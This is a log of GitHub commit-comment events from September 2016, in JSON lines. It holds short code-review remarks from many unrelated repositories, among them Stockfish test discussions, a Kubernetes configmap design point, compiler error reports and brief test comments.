{"id":"4606930886","type":"CommitCommentEvent","actor":{"login":"xpirt"},"repo":{"name":"xpirt/sdat2img"},"payload":{"comment":{"id":19141932,"position":41,"line":77,"path":"sdat2img.py","commit_id":"8ec97e5644175752f14a6f1c832d244aa93ec909","created_at":"2016-09-23T07:07:38Z","updated_at":"2016-09-23T07:07:38Z","body":"Please open an issue if you got any error."}},"created_at":"2016-09-23T07:07:38Z"}
{"id":"4606931671","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19141936,"position":27,"line":27,"path":"monitor/src/main/java/com/emc/mongoose/monitor/impl/FsDriverFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:07:54Z","updated_at":"2016-09-23T07:07:54Z","body":"I fell ashamed but i dunno what's wrong"}},"created_at":"2016-09-23T07:07:54Z"}
{"id":"4606932486","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19141939,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/Factory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:08:09Z","updated_at":"2016-09-23T07:08:09Z","body":"common?"}},"created_at":"2016-09-23T07:08:09Z"}
{"id":"4606933330","type":"CommitCommentEvent","actor":{"login":"tinagiesler"},"repo":{"name":"typearea/projectmanagement"},"payload":{"comment":{"id":19141942,"position":null,"line":null,"path":null,"commit_id":"7109d7409f168a3510ed89b71a1016ecdc3ac12d","created_at":"2016-09-23T07:08:25Z","updated_at":"2016-09-23T07:08:25Z","body":"Gefällt mir sehr gut!\r\n\r\nNur müsste das i auf allen Ansichten zu sehen sein, immerhin liegt dahinter das Impressum und co. Oder sollte das auch ins Hamburgermenü? \r\n\r\nDann könnte man hinter das i die Textmeta legen, aber dann darf das i erst auftauchen, wenn der Leser am Ende angekommen ist.\r\n\r\n@SarahSauer @Dembelo-Jessica was sagt ihr dazu?"}},"created_at":"2016-09-23T07:08:25Z"}
{"id":"4606933725","type":"CommitCommentEvent","actor":{"login":"kisliakovsky"},"repo":{"name":"emc-mongoose/mongoose"},"payload":{"comment":{"id":19141943,"position":6,"line":6,"path":"monitor/src/main/java/com/emc/mongoose/monitor/api/TypedFactory.java","commit_id":"f3aa1c8073099f203a6c69d8500743e71317fbc8","created_at":"2016-09-23T07:08:34Z","updated_at":"2016-09-23T07:08:34Z","body":"What do you think of TypedFactory?"}},"created_at":"2016-09-23T07:08:34Z"}
{"id":"4606933827","type":"CommitCommentEvent","actor":{"login":"danielnaber"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19141944,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-23T07:08:35Z","updated_at":"2016-09-23T07:08:35Z","body":"If you have a fix, please upload the dict somewhere so we can test it (i.e. don't commit to git yet, to avoid useless binaries in the git history)."}},"created_at":"2016-09-23T07:08:35Z"}
{"id":"4606934909","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19141947,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T07:08:57Z","updated_at":"2016-09-23T07:08:57Z","body":"But on STC it failed after only 6k games with an Elo -5,84 performance, it was the same commit, right?\r\n\r\nIn light of this, I'm also tempted to do a speculative LTC based on [this](http://tests.stockfishchess.org/tests/view/57e0eb120ebc59763f358b9d) which was the first yellow one based on this, is a simpler version and it's performance was more or less equal to [this ](http://tests.stockfishchess.org/tests/view/57e2de640ebc59763f358c86)"}},"created_at":"2016-09-23T07:08:57Z"}
{"id":"4606935949","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19141949,"position":4,"line":0,"path":"HelloWorld/Miscellaneous/MemoryModel.cs","commit_id":"92bc2bf1df13b8ace310e26f986aab561f325d1b","created_at":"2016-09-23T07:09:15Z","updated_at":"2016-09-23T07:09:15Z","body":"В самих элементах перечисления уже нет нужды указывать Code в названии. "}},"created_at":"2016-09-23T07:09:15Z"}
{"id":"4606936136","type":"CommitCommentEvent","actor":{"login":"manikanta-pt"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19141951,"position":181,"line":181,"path":"egov/egov-lcms/src/main/java/org/egov/lcms/transactions/service/GenericSubReportService.java","commit_id":"96de9ce3e2108ca65965798a87b6b5306cb424c6","created_at":"2016-09-23T07:09:19Z","updated_at":"2016-09-23T07:09:19Z","body":"You are writing void method and Manipulating the input fields. This is not good practice. Also try to use Criteria Builder "}},"created_at":"2016-09-23T07:09:19Z"}
{"id":"4606940544","type":"CommitCommentEvent","actor":{"login":"thinca"},"repo":{"name":"railsconfig/config"},"payload":{"comment":{"id":19141958,"position":6,"line":5,"path":"CHANGELOG.md","commit_id":"80b2e7bf28fed14f0c33b1609af1dd7166313341","created_at":"2016-09-23T07:10:38Z","updated_at":"2016-09-23T07:10:38Z","body":"Maybe this is `config.overwrite_arrays = false`, isn't it?"}},"created_at":"2016-09-23T07:10:38Z"}
{"id":"4606940842","type":"CommitCommentEvent","actor":{"login":"reaalkhalil"},"repo":{"name":"insciteco/oxford"},"payload":{"comment":{"id":19141960,"position":null,"line":null,"path":null,"commit_id":"9244a97c8f1c3f8146e8add1d3125e457b8c2b4d","created_at":"2016-09-23T07:10:44Z","updated_at":"2016-09-23T07:10:44Z","body":"btw, the photos don't need to be cut into a circle, there is a border radius around the image, the last IT officer thought this was more convenient, but there's no need to bother with it anymore"}},"created_at":"2016-09-23T07:10:44Z"}
{"id":"4606941165","type":"CommitCommentEvent","actor":{"login":"dingjuanww"},"repo":{"name":"dingjuanww/javascript"},"payload":{"comment":{"id":19141962,"position":null,"line":null,"path":null,"commit_id":"51373d597258e56e8dbac77f427c970818968962","created_at":"2016-09-23T07:10:50Z","updated_at":"2016-09-23T07:10:50Z","body":"测试IE与FF浏览器的兼容"}},"created_at":"2016-09-23T07:10:50Z"}
{"id":"4606942525","type":"CommitCommentEvent","actor":{"login":"KirillMysnik"},"repo":{"name":"Source-Python-Dev-Team/Source.Python"},"payload":{"comment":{"id":19141969,"position":null,"line":null,"path":null,"commit_id":"f4061002ab6088f3b01f98af5ac99526bf73cc4b","created_at":"2016-09-23T07:11:15Z","updated_at":"2016-09-23T07:11:15Z","body":"Not much time has passed since 464fd06a86b369b592646650e44cfd362b476fca"}},"created_at":"2016-09-23T07:11:15Z"}
{"id":"4606946434","type":"CommitCommentEvent","actor":{"login":"radubrehar"},"repo":{"name":"radubrehar/react-window"},"payload":{"comment":{"id":19141972,"position":5,"line":793,"path":"src/index.jsx","commit_id":"1b2993175d8d603c4b3624e0f8b462df33bd98d4","created_at":"2016-09-23T07:12:22Z","updated_at":"2016-09-23T07:12:22Z","body":"It's a feature :) it the user configures no title, the title section should not be rendered. Or have you found another bug related to this?"}},"created_at":"2016-09-23T07:12:22Z"}
{"id":"4606949205","type":"CommitCommentEvent","actor":{"login":"gares"},"repo":{"name":"coq/ceps"},"payload":{"comment":{"id":19141980,"position":null,"line":null,"path":null,"commit_id":"99a8b83e31c755a659e9ef2332bbb566a9837784","created_at":"2016-09-23T07:13:13Z","updated_at":"2016-09-23T07:13:13Z","body":"I guess @yurug is interested in that too"}},"created_at":"2016-09-23T07:13:13Z"}
{"id":"4606950080","type":"CommitCommentEvent","actor":{"login":"hagrid-the-developer"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":19141985,"position":null,"line":null,"path":null,"commit_id":"d177e9cd67cc01e28f13310b09a4e72af861cf79","created_at":"2016-09-23T07:13:29Z","updated_at":"2016-09-23T07:13:29Z","body":"Why are asserts better than returns?"}},"created_at":"2016-09-23T07:13:29Z"}
{"id":"4606950333","type":"CommitCommentEvent","actor":{"login":"boy0001"},"repo":{"name":"boy0001/FastAsyncWorldedit"},"payload":{"comment":{"id":19141986,"position":1,"line":18,"path":"build.gradle","commit_id":"2cb1485553debf541d865471ff52fec95fc4adf3","created_at":"2016-09-23T07:13:34Z","updated_at":"2016-09-23T07:13:34Z","body":"*Also allows setting multiple masks per brush/gmask (space between masks)"}},"created_at":"2016-09-23T07:13:34Z"}
{"id":"4606950378","type":"CommitCommentEvent","actor":{"login":"radubrehar"},"repo":{"name":"radubrehar/react-window"},"payload":{"comment":{"id":19141987,"position":5,"line":793,"path":"src/index.jsx","commit_id":"1b2993175d8d603c4b3624e0f8b462df33bd98d4","created_at":"2016-09-23T07:13:34Z","updated_at":"2016-09-23T07:13:34Z","body":"oups, I see :)"}},"created_at":"2016-09-23T07:13:34Z"}
{"id":"4606951839","type":"CommitCommentEvent","actor":{"login":"anka976"},"repo":{"name":"javadev/undescriptive-project"},"payload":{"comment":{"id":19141996,"position":null,"line":null,"path":null,"commit_id":"0a30d5882e48d27ddd8b20df61eb265e35a463dc","created_at":"2016-09-23T07:13:58Z","updated_at":"2016-09-23T07:13:58Z","body":"Nice approach with lodash!\r\nWhat is the average win-ratio with those predefined solutions?  "}},"created_at":"2016-09-23T07:13:58Z"}
{"id":"4606959468","type":"CommitCommentEvent","actor":{"login":"Cookly404"},"repo":{"name":"Cookly404/hello_world"},"payload":{"comment":{"id":19142007,"position":1,"line":1,"path":"README.md","commit_id":"2b7fe41704449c7c517814c3a38b502a73c0a80e","created_at":"2016-09-23T07:16:14Z","updated_at":"2016-09-23T07:16:14Z","body":"testt"}},"created_at":"2016-09-23T07:16:14Z"}
{"id":"4606959863","type":"CommitCommentEvent","actor":{"login":"masalmon"},"repo":{"name":"masalmon/fietsen"},"payload":{"comment":{"id":19142009,"position":null,"line":null,"path":null,"commit_id":"fdd56b557492afc0520ade113024aaee3f84d2c4","created_at":"2016-09-23T07:16:21Z","updated_at":"2016-09-23T07:16:21Z","body":"Wow the difference for Orebro is huge..."}},"created_at":"2016-09-23T07:16:21Z"}
{"id":"4606963296","type":"CommitCommentEvent","actor":{"login":"luigidellaquila"},"repo":{"name":"orientechnologies/orientdb"},"payload":{"comment":{"id":19142015,"position":133,"line":398,"path":"core/src/main/java/com/orientechnologies/orient/core/command/script/OCommandExecutorScript.java","commit_id":"98687a37b18e8a9f84cd7a4d61134d2bcf337750","created_at":"2016-09-23T07:17:22Z","updated_at":"2016-09-23T07:17:22Z","body":"The parsing for unmatched quotes is made in the new SQL parser, that in 2.2 is used as a pre-parsing step, but in v 3.0 will be the main and only parser used"}},"created_at":"2016-09-23T07:17:22Z"}
{"id":"4606966101","type":"CommitCommentEvent","actor":{"login":"Hegenov"},"repo":{"name":"GluuFederation/oxTrust"},"payload":{"comment":{"id":19142018,"position":null,"line":null,"path":null,"commit_id":"1b7fcc3a8b7ddf038f6303ef074b6c76e36e270e","created_at":"2016-09-23T07:18:14Z","updated_at":"2016-09-23T07:18:14Z","body":"Thanks for info."}},"created_at":"2016-09-23T07:18:14Z"}
{"id":"4606968351","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"TingYiShun/spectrwm"},"payload":{"comment":{"id":19142024,"position":null,"line":null,"path":null,"commit_id":"a3b566b69b5ad21bfe8a83c28ce31bb836785032","created_at":"2016-09-23T07:18:55Z","updated_at":"2016-09-23T07:18:55Z","body":"\r\n\r\nThis GIF demonstrates the iterative nature of the algorithm, attempting to minimize the mean squared error by adding one shape at a time. (Use a \".gif\" output file to generate one yourself!)\r\n\r\n\r\n \r\n  "}},"created_at":"2016-09-23T07:18:55Z"}
{"id":"4606970616","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"javadev/undescriptive-project"},"payload":{"comment":{"id":19142031,"position":null,"line":null,"path":null,"commit_id":"0a30d5882e48d27ddd8b20df61eb265e35a463dc","created_at":"2016-09-23T07:19:34Z","updated_at":"2016-09-23T07:19:34Z","body":"@anka976 Acording to unit test win-ratio is 100%."}},"created_at":"2016-09-23T07:19:34Z"}
{"id":"4606972173","type":"CommitCommentEvent","actor":{"login":"KlymSerhii"},"repo":{"name":"JoeyZy/WhereToGo"},"payload":{"comment":{"id":19142034,"position":null,"line":null,"path":null,"commit_id":"69441a5f4208ec113a78fd595b98d77d28644402","created_at":"2016-09-23T07:20:01Z","updated_at":"2016-09-23T07:20:01Z","body":"\"...then in creation event form DESCRIPTION was already filled\"*"}},"created_at":"2016-09-23T07:20:01Z"}
{"id":"4606972366","type":"CommitCommentEvent","actor":{"login":"Andrettin"},"repo":{"name":"Andrettin/Wyrmgus"},"payload":{"comment":{"id":19142035,"position":null,"line":null,"path":null,"commit_id":"46a3ad08f55c63a23087ab9f871d6adae91ce114","created_at":"2016-09-23T07:20:05Z","updated_at":"2016-09-23T07:20:05Z","body":"Thank you! This should be fixed now:\r\nhttps://github.com/Andrettin/Wyrmgus/commit/3c3d133e131fcd7c88f7c9c88f8f4b2f65189796"}},"created_at":"2016-09-23T07:20:05Z"}
{"id":"4606974547","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19142040,"position":null,"line":null,"path":null,"commit_id":"f2639179372eba1ebe9de885939b02d6160a1a20","created_at":"2016-09-23T07:20:42Z","updated_at":"2016-09-23T07:20:42Z","body":"This is all excellent news!"}},"created_at":"2016-09-23T07:20:42Z"}
{"id":"4606980224","type":"CommitCommentEvent","actor":{"login":"harunurhan"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19142050,"position":null,"line":null,"path":null,"commit_id":"746d2e97ee7e33720a6d63264d43c1c2e10e869d","created_at":"2016-09-23T07:22:19Z","updated_at":"2016-09-23T07:22:19Z","body":"It is not very important but shouldn't we remove the `@tpyes/core-js` https://github.com/AngularClass/angular2-webpack-starter/blob/master/package.json#L84"}},"created_at":"2016-09-23T07:22:19Z"}
{"id":"4606982658","type":"CommitCommentEvent","actor":{"login":"kurtinjaks"},"repo":{"name":"kurtinjaks/test"},"payload":{"comment":{"id":19142053,"position":null,"line":null,"path":null,"commit_id":"45adf99d59d5c336fe1a881125cc22d0d0468f1e","created_at":"2016-09-23T07:23:04Z","updated_at":"2016-09-23T07:23:04Z","body":"testas"}},"created_at":"2016-09-23T07:23:04Z"}
{"id":"4606982932","type":"CommitCommentEvent","actor":{"login":"kurtinjaks"},"repo":{"name":"kurtinjaks/test"},"payload":{"comment":{"id":19142055,"position":null,"line":null,"path":null,"commit_id":"45adf99d59d5c336fe1a881125cc22d0d0468f1e","created_at":"2016-09-23T07:23:09Z","updated_at":"2016-09-23T07:23:09Z","body":"tests"}},"created_at":"2016-09-23T07:23:09Z"}
{"id":"4606983744","type":"CommitCommentEvent","actor":{"login":"muglikar"},"repo":{"name":"panmari/caffe"},"payload":{"comment":{"id":19142057,"position":null,"line":null,"path":null,"commit_id":"08415681166967f9e22ffe189913feb2417f834b","created_at":"2016-09-23T07:23:22Z","updated_at":"2016-09-23T07:23:22Z","body":"@panmari Comments?"}},"created_at":"2016-09-23T07:23:22Z"}
{"id":"4606983748","type":"CommitCommentEvent","actor":{"login":"sebgoa"},"repo":{"name":"skippbox/ansible-cloudstack"},"payload":{"comment":{"id":19142058,"position":15,"line":78,"path":"roles/k8s/templates/k8s-node.j2","commit_id":"d6bc4b26a37b43bc60d4d43530ee1e45d244e791","created_at":"2016-09-23T07:23:22Z","updated_at":"2016-09-23T07:23:22Z","body":"cool, so next step then (if we are working on the same thing) is how to enable PV on this coreOS based cluster ?"}},"created_at":"2016-09-23T07:23:22Z"}
{"id":"4606989555","type":"CommitCommentEvent","actor":{"login":"muglikar"},"repo":{"name":"panmari/caffe"},"payload":{"comment":{"id":19142070,"position":null,"line":null,"path":null,"commit_id":"08415681166967f9e22ffe189913feb2417f834b","created_at":"2016-09-23T07:25:07Z","updated_at":"2016-09-23T07:25:07Z","body":"@isalirezag @longjon Found any solution?"}},"created_at":"2016-09-23T07:25:07Z"}
{"id":"4606993512","type":"CommitCommentEvent","actor":{"login":"xens0117"},"repo":{"name":"dwander/Prime-Kernel"},"payload":{"comment":{"id":19142075,"position":17,"line":1129,"path":"kernel/sched/core.c","commit_id":"eb326518709844d5121dba975ea10ba940f8e22d","created_at":"2016-09-23T07:26:15Z","updated_at":"2016-09-23T07:26:15Z","body":"Andreilux의 커밋에는 이 부분이 cpu_read_relax(); 로 적용되어있는데 cpu_relax();로 남겨두신 이유가 있나요?\r\n또한 lllist 부분도 모두 적용하지 않으셨는데 이유가 궁금하네요."}},"created_at":"2016-09-23T07:26:15Z"}
{"id":"4606993605","type":"CommitCommentEvent","actor":{"login":"mafiosoloco"},"repo":{"name":"SmartSolutionsDW/smartsolution_v3"},"payload":{"comment":{"id":19142076,"position":null,"line":null,"path":null,"commit_id":"fc481d69220106e9b585479704d756369841d842","created_at":"2016-09-23T07:26:17Z","updated_at":"2016-09-23T07:26:17Z","body":"   modified:   app/controllers/home_controller.rb\r\n        modified:   app/models/user.rb\r\n        modified:   config/initializers/devise.rb\r\n        modified:   config/routes.rb\r\n------------------------------"}},"created_at":"2016-09-23T07:26:17Z"}
{"id":"4606997004","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19142084,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T07:27:14Z","updated_at":"2016-09-23T07:27:14Z","body":"@pb00068 The funny thing is that it first failed yellow after more than 100k games and then red after 6K games (same bench for both tests). And it's doing well at LTC..."}},"created_at":"2016-09-23T07:27:14Z"}
{"id":"4606998084","type":"CommitCommentEvent","actor":{"login":"Hughsonz"},"repo":{"name":"Hughsonz/jose"},"payload":{"comment":{"id":19142086,"position":null,"line":null,"path":null,"commit_id":"f994ca95a3de0a833abc6d01131f0b66bed31b7e","created_at":"2016-09-23T07:27:33Z","updated_at":"2016-09-23T07:27:33Z","body":"[[hughson@centos jose-3]$ make\r\n  CC       lib/misc.lo\r\nlib/misc.c: In function 'compact_to_obj':\r\nlib/misc.c:66:9: error: implicit declaration of function 'json_stringn' [-Werror=implicit-function-declaration]\r\n         json_t *val = json_stringn(&compact[c], len[i]);\r\n         ^\r\nlib/misc.c:66:9: error: nested extern declaration of 'json_stringn' [-Werror=nested-externs]\r\nlib/misc.c:66:23: error: initialization makes pointer from integer without a cast [-Werror]\r\n         json_t *val = json_stringn(&compact[c], len[i]);\r\n                       ^\r\ncc1: all warnings being treated as errors\r\n─────────────────────────────────────────────────────────────────\r\nWhen I try to compile this code, I get the error shown above. How do I fix it?"}},"created_at":"2016-09-23T07:27:33Z"}
{"id":"4607002400","type":"CommitCommentEvent","actor":{"login":"molotoksoftware"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19142095,"position":4,"line":0,"path":"frontend/controllers/CountryController.php","commit_id":"98f7bc397a804dcba973641c5524df7b6ddf7af7","created_at":"2016-09-23T07:28:45Z","updated_at":"2016-09-23T07:28:45Z","body":"Можно продублировать"}},"created_at":"2016-09-23T07:28:45Z"}
{"id":"4607004594","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19142098,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T07:29:19Z","updated_at":"2016-09-23T07:29:19Z","body":"@ElbertoOne Yeah, seems that [STC](http://tests.stockfishchess.org/tests/view/57e446a80ebc59763f358d04) was merely a very unlucky ;-)"}},"created_at":"2016-09-23T07:29:19Z"}
{"id":"4607007522","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19142101,"position":null,"line":null,"path":null,"commit_id":"1a3d8a119a4cb3c195c69c865f4a375a91b23e8b","created_at":"2016-09-23T07:30:09Z","updated_at":"2016-09-23T07:30:09Z","body":"Have you compared the error bars? I claim bad luck for the 6k result :-("}},"created_at":"2016-09-23T07:30:09Z"}
{"id":"4607008225","type":"CommitCommentEvent","actor":{"login":"TingYiShun"},"repo":{"name":"TingYiShun/spectrwm"},"payload":{"comment":{"id":19142103,"position":null,"line":null,"path":null,"commit_id":"a3b566b69b5ad21bfe8a83c28ce31bb836785032","created_at":"2016-09-23T07:30:19Z","updated_at":"2016-09-23T07:30:19Z","body":"Some things need pay attention to:\r\nif strings.HasSuffix(strings.ToLower(Output), \".gif\") {\r\n  \t\tframes := model.Frames(0.001)\r\n  \t\tprimitive.SaveGIFImageMagick(Output, frames, 50, 250)\r\n +\t} else if strings.HasSuffix(strings.ToLower(Output), \".svg\") {\r\n +\t\tprimitive.SaveFile(Output, model.SVG())\r\n  \t} else {\r\n  \t\tprimitive.SavePNG(Output, output)\r\n  \t\r\n"}},"created_at":"2016-09-23T07:30:19Z"}
{"id":"4607010296","type":"CommitCommentEvent","actor":{"login":"motyar"},"repo":{"name":"Xeoncross/goworkqueue"},"payload":{"comment":{"id":19142109,"position":null,"line":null,"path":null,"commit_id":"58d1d29ae9efa55537f2275bf03b47a1b39ed221","created_at":"2016-09-23T07:30:52Z","updated_at":"2016-09-23T07:30:52Z","body":"What code editor you use for Go?"}},"created_at":"2016-09-23T07:30:52Z"}
{"id":"4607012395","type":"CommitCommentEvent","actor":{"login":"gwangil-choi"},"repo":{"name":"gwangil-choi/cubrid"},"payload":{"comment":{"id":19142111,"position":null,"line":null,"path":null,"commit_id":"027e420a9660c128e77de82c11fda8f3035e4507","created_at":"2016-09-23T07:31:31Z","updated_at":"2016-09-23T07:31:31Z","body":"merge from cubrid develop branch "}},"created_at":"2016-09-23T07:31:31Z"}
{"id":"4607013720","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19142113,"position":null,"line":null,"path":null,"commit_id":"5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd","created_at":"2016-09-23T07:31:55Z","updated_at":"2016-09-23T07:31:55Z","body":"fix_gcc48_ICE (macumber) - i386-Windows-7-VisualStudio-12: OK (2319 of 2334 tests passed, 557 test warnings)\n\n * 572 tests had: AUD diffs.\n * 36 tests had: ERR diffs.\n * 14 tests had: Table big diffs.\n * 37 tests had: EIO diffs.\n * 8 tests had: ESO small diffs.\n * 8 tests had: ESO big diffs.\n * 2 tests had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 13 tests had: RDD diffs.\n * 3 tests had: MTD diffs.\n * 4 tests had: MTR big diffs.\n * 1 test had: MDD diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 3 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5ecbf88d0f65aae0c0c8a038b7f77ad7660961fd-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.36%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T07:31:55Z"}
{"id":"4607014357","type":"CommitCommentEvent","actor":{"login":"matejbuzas"},"repo":{"name":"mreguly/repo"},"payload":{"comment":{"id":19142118,"position":null,"line":null,"path":null,"commit_id":"347921b5b150c1c139967b6ab5089f288538389f","created_at":"2016-09-23T07:32:07Z","updated_at":"2016-09-23T07:32:07Z","body":"pekne stefan, si sikovny"}},"created_at":"2016-09-23T07:32:07Z"}
{"id":"4607014882","type":"CommitCommentEvent","actor":{"login":"3unjee"},"repo":{"name":"omega-gg/Sky"},"payload":{"comment":{"id":19142120,"position":25,"line":86,"path":"configure.sh","commit_id":"bae6bb6198d5e6e7976d534bacb14d25465da566","created_at":"2016-09-23T07:32:16Z","updated_at":"2016-09-23T07:32:16Z","body":"You are absolutely right."}},"created_at":"2016-09-23T07:32:16Z"}
{"id":"4607025439","type":"CommitCommentEvent","actor":{"login":"idenet"},"repo":{"name":"idenet/nodeNews"},"payload":{"comment":{"id":19142138,"position":null,"line":null,"path":null,"commit_id":"e8d7055eeeea2ab67a2d362c8d9343e6592c5daf","created_at":"2016-09-23T07:35:13Z","updated_at":"2016-09-23T07:35:13Z","body":"Node练手项目"}},"created_at":"2016-09-23T07:35:13Z"}
{"id":"4607031410","type":"CommitCommentEvent","actor":{"login":"kuc"},"repo":{"name":"dorkbox/SystemTray"},"payload":{"comment":{"id":19142151,"position":null,"line":null,"path":null,"commit_id":"3d8459ecc377e9f7cb49d4a2856bf4f328607775","created_at":"2016-09-23T07:36:56Z","updated_at":"2016-09-23T07:36:56Z","body":"You committed binary files by accident..."}},"created_at":"2016-09-23T07:36:56Z"}
{"id":"4607032770","type":"CommitCommentEvent","actor":{"login":"liggitt"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19142154,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-23T07:37:20Z","updated_at":"2016-09-23T07:37:20Z","body":"There's potential for confusion both ways. A file that is used as a binary file that happens to contain bytes that are valid UTF8 characters will show up as a garbled \"text\" string in the `data` map. \r\n\r\nWhen we get to the point of updating configmaps, sniffing and auto partitioning files to the different maps means if a file changes from valid UTF8 to invalid UTF8, the updated configmap could be more difficult to apply cleanly. \r\n\r\nMy preference would be to be explicit about the intent. The point about separate directories is interesting, but if a user had a mix of binary and text files, they could point to the directory and treat them all as binary and it would work. "}},"created_at":"2016-09-23T07:37:20Z"}
{"id":"4607032772","type":"CommitCommentEvent","actor":{"login":"mobedu"},"repo":{"name":"faddat/orangepipc-linux"},"payload":{"comment":{"id":19142155,"position":null,"line":null,"path":null,"commit_id":"6cd3641c8003e0bde3a46922c802ad8bdd4617f5","created_at":"2016-09-23T07:37:20Z","updated_at":"2016-09-23T07:37:20Z","body":"boot.cmd not found."}},"created_at":"2016-09-23T07:37:20Z"}
{"id":"4607033199","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142157,"position":7,"line":84,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:37:26Z","updated_at":"2016-09-23T07:37:26Z","body":"It would be better to use the minified bootstrap files from the bootstrap website"}},"created_at":"2016-09-23T07:37:26Z"}
{"id":"4607033390","type":"CommitCommentEvent","actor":{"login":"katallaxie"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":19142158,"position":null,"line":null,"path":null,"commit_id":"746d2e97ee7e33720a6d63264d43c1c2e10e869d","created_at":"2016-09-23T07:37:29Z","updated_at":"2016-09-23T07:37:29Z","body":"@harunurhan PR"}},"created_at":"2016-09-23T07:37:29Z"}
{"id":"4607040285","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142172,"position":40,"line":245,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:39:28Z","updated_at":"2016-09-23T07:39:28Z","body":"This is a great addition - but there isn't a dropdown for it on the add/edit form - should there be?"}},"created_at":"2016-09-23T07:39:28Z"}
{"id":"4607041815","type":"CommitCommentEvent","actor":{"login":"TherianSK"},"repo":{"name":"ivan-lattak/c--"},"payload":{"comment":{"id":19142175,"position":10,"line":10,"path":"hanoi.c","commit_id":"df23924cac815c32fe1b6d7f435d12e627df7670","created_at":"2016-09-23T07:39:52Z","updated_at":"2016-09-23T07:39:52Z","body":"Mas tam chybu ma tam byt do nie od"}},"created_at":"2016-09-23T07:39:52Z"}
{"id":"4607042679","type":"CommitCommentEvent","actor":{"login":"mraspaud"},"repo":{"name":"khunger/mpop"},"payload":{"comment":{"id":19142178,"position":13,"line":406,"path":"mpop/imageo/formats/ninjotiff.py","commit_id":"3f0bee69b88ffed4db48447e712cc6e776796e1c","created_at":"2016-09-23T07:40:09Z","updated_at":"2016-09-23T07:40:09Z","body":"could you put writer_options after ninjo_product_name for backward compatibility"}},"created_at":"2016-09-23T07:40:09Z"}
{"id":"4607044356","type":"CommitCommentEvent","actor":{"login":"dasgarner"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":19142183,"position":126,"line":408,"path":"lib/Widget/ForecastIo.php","commit_id":"ed9dcbe476099c7dc17f117f4bd5707a4537c41a","created_at":"2016-09-23T07:40:36Z","updated_at":"2016-09-23T07:40:36Z","body":"I don't think this should be here, right? Isn't it addressed in the foreach below?"}},"created_at":"2016-09-23T07:40:36Z"}
{"id":"4607051266","type":"CommitCommentEvent","actor":{"login":"raido"},"repo":{"name":"raido/babel.github.io"},"payload":{"comment":{"id":19142200,"position":null,"line":null,"path":null,"commit_id":"425ae17d922138414feb3cd43f35c7c242c5103d","created_at":"2016-09-23T07:42:34Z","updated_at":"2016-09-23T07:42:34Z","body":"@hzoo Is this something that should be documented?"}},"created_at":"2016-09-23T07:42:34Z"}
